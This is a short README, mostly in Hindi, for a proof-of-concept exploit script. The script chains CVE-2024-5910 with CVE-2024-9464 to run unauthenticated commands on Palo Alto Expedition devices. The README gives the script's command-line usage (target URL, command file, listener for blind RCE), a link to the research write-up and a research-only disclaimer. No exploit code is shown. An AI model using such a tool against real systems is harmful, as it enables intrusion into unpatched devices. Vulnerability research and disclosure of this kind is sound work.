
CVE-2024-9464 के लिए प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट
कमजोर उपकरणों पर CVE-2024-9464 का शोषण करने के लिए प्रूफ ऑफ कॉन्सेप्ट। यह स्क्रिप्ट CVE-2024-5910 के एडमिन रीसेट को चेन करके 'अनप्रमाणित' मनमाना कमांड निष्पादन प्राप्त करती है।
कारण और समझौता संकेतक यहाँ: https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise/
% python3 CVE-2024-9464.py -h
usage: CVE-2024-9464.py [-h] -u URL -c CMD_FILE [-li LISTEN_IP] [-lp LISTEN_PORT]
options:
-h, --help show this help message and exit
-u URL, --url URL The URL of the target
-c CMD_FILE, --cmd_file CMD_FILE
The commands to execute blind
-li LISTEN_IP, --listen_ip LISTEN_IP
local IP to bind to
-lp LISTEN_PORT, --listen_port LISTEN_PORT
local HTTP port to bind to, for blind RCE mode
यह सॉफ्टवेयर विशुद्ध रूप से अकादमिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और स्पष्ट रूप से अधिकृत होने के अलावा सिस्टम पर हमला करने के लिए इसका उपयोग करने का इरादा नहीं है। परियोजना अनुरक्षक सॉफ्टवेयर के दुरुपयोग के लिए जिम्मेदार या उत्तरदायी नहीं हैं। जिम्मेदारी से उपयोग करें।